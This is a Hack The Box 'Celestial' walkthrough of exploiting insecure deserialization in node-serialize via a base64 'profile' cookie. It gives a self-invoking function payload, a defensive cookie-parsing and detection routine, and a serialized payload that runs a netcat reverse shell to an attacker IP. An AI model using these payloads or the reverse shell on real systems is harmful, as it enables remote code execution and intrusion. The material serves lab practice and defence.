# Node.js - Insecure Deserialization : Celestial (HTB)

the `node express` application is served on port `3000`

![](/files/ziowCmYGQWcYGzJrty2Y)

intercepting the first request gave us a 404 page, but after refreshing the page we can see a new cookie value ( `profile` )

![](/files/NqtRSAI9b6jp3LkU3tk7)

decoding the `profile` value shows that it is `json` data

![](/files/0jBvd48WBjAAtDwRDEsu)

### Triggering the vulnerability :

**Scenario :** we will `serialize` an object and inject it into the cookie parameter ( `profile` ) to see if the server `deserializes` our object; if it does, the application is vulnerable to insecure deserialization

**Serialization Code:**

using the below code, we will serialize an object which just has a function that returns the "`the app is vulnerable to insecure deserialization`" message (as described in this article: <https://medium.com/@chaudharyaditya/insecure-deserialization-3035c6b5766e>)

```javascript
// node-serialize encodes a function-valued property as a string prefixed
// with its marker; the server-side unserialize() turns it back into code
var serialize = require('node-serialize');

var x = {
  username: function () { return 'the app is vulnerable to insecure deserialization'; }
};

console.log("Serialized: \n" + serialize.serialize(x));
```

the serialized object

```json
{"username":"_$$ND_FUNC$$_function(){ return 'the app is vulnerable to insecure deserialization'; }"}
```

and we need to append the `()` value at the end of the function, to make the function self-invoking ( [Immediately invoked function expression (IIFE)](https://en.wikipedia.org/wiki/Immediately-invoked_function_expression) )

```json
{"username":"_$$ND_FUNC$$_function(){ return 'the app is vulnerable to insecure deserialization'; }()"}
```

encode the object to `base64`

![](/files/S9DXh5nlZYJxyrBIroNG)

sending the request, we can see that the server deserialized our object

![](/files/dWwbNTZAd9HaBqim0kFy)
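As an added defensive counterpart (not code from the original write-up or from the Celestial application): a replacement for `unserialize()` on the `profile` cookie that base64-decodes it, uses `JSON.parse` (which has no function-revival path), rejects any string carrying node-serialize's `_$$ND_FUNC$$_` marker, and whitelists the expected fields. The field names in `SCHEMA` and the benign sample profile are assumptions; the malicious sample is the IIFE payload shown above.

```javascript
// Added defensive example, not code from the original write-up.
// node-serialize revives any string that starts with its marker into a function via
// eval(); a trailing "()" runs it inside unserialize(). A safe replacement never evals.
const FUNC_FLAG = '_$$ND_FUNC$$_'; // marker string used by node-serialize
// Assumed shape of the profile cookie (these field names are an assumption).
const SCHEMA = { username: 'string', country: 'string', city: 'string', num: 'string' };

// Recursively report whether any string inside value carries the marker,
// so nested objects and arrays cannot hide a payload.
function containsFuncMarker(value) {
  if (typeof value === 'string') return value.startsWith(FUNC_FLAG);
  if (Array.isArray(value)) return value.some(containsFuncMarker);
  if (value !== null && typeof value === 'object') {
    return Object.values(value).some(containsFuncMarker);
  }
  return false;
}

// Base64-decode the cookie, parse it as data only, and enforce the schema.
// Throws on anything the application did not expect.
function parseProfileCookie(cookieValue) {
  const json = Buffer.from(cookieValue, 'base64').toString('utf8');
  const data = JSON.parse(json); // JSON.parse never revives functions
  if (data === null || typeof data !== 'object' || Array.isArray(data)) {
    throw new Error('profile must be a JSON object');
  }
  if (containsFuncMarker(data)) {
    throw new Error('profile contains a node-serialize function marker');
  }
  for (const key of Object.keys(data)) {
    if (!Object.prototype.hasOwnProperty.call(SCHEMA, key)) {
      throw new Error(`unexpected profile field: ${key}`);
    }
  }
  for (const key of Object.keys(SCHEMA)) {
    if (typeof data[key] !== SCHEMA[key]) throw new Error(`profile.${key} must be a ${SCHEMA[key]}`);
  }
  return data;
}
// Detection helper for request logging or WAF-style checks: true means flag it.
function isSuspiciousProfileCookie(cookieValue) {
  try { parseProfileCookie(cookieValue); return false; } catch (err) { return true; }
}
// Constructed samples: a benign profile and the IIFE payload from the write-up.
const benignCookie = Buffer.from(JSON.stringify({ username: 'Dummy', country: 'Nowhere', city: 'Lametown', num: '2' })).toString('base64');
const maliciousCookie = Buffer.from(
  '{"username":"_$$ND_FUNC$$_function(){ return \'the app is vulnerable to insecure deserialization\'; }()"}'
).toString('base64');
console.log(isSuspiciousProfileCookie(benignCookie), isSuspiciousProfileCookie(maliciousCookie)); // false true
```

The same `containsFuncMarker` walk can be run over logged cookie values to flag past attempts, since node-serialize only emits the marker for function-valued properties and a legitimate plain-data profile never contains it.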

### Reverse Shell - BASH TCP :

we will execute the below command on the server using the serialized object to gain a shell on the server

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4242 >/tmp/f
```

**Serialization Code:**

```javascript
var serialize = require('node-serialize');

var x = {
  // execSync takes no callback; the trailing function argument is ignored by Node
  username: function(){require('child_process').execSync("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4242 >/tmp/f", function puts(error, stdout, stderr) {});}
};

console.log("Serialized: \n" + serialize.serialize(x));
```

Serialized object :

```json
{"username":"_$$ND_FUNC$$_function(){require('child_process').execSync(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.8 4242 >/tmp/f\", function puts(error, stdout, stderr) {});}"}
```

making the function self-invoking

```json
{"username":"_$$ND_FUNC$$_function(){require('child_process').execSync(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4242 >/tmp/f\", function puts(error, stdout, stderr) {});}()"}
```

and we got the shell

![](/files/HXWK0LGzXpef9QdtyoT2)

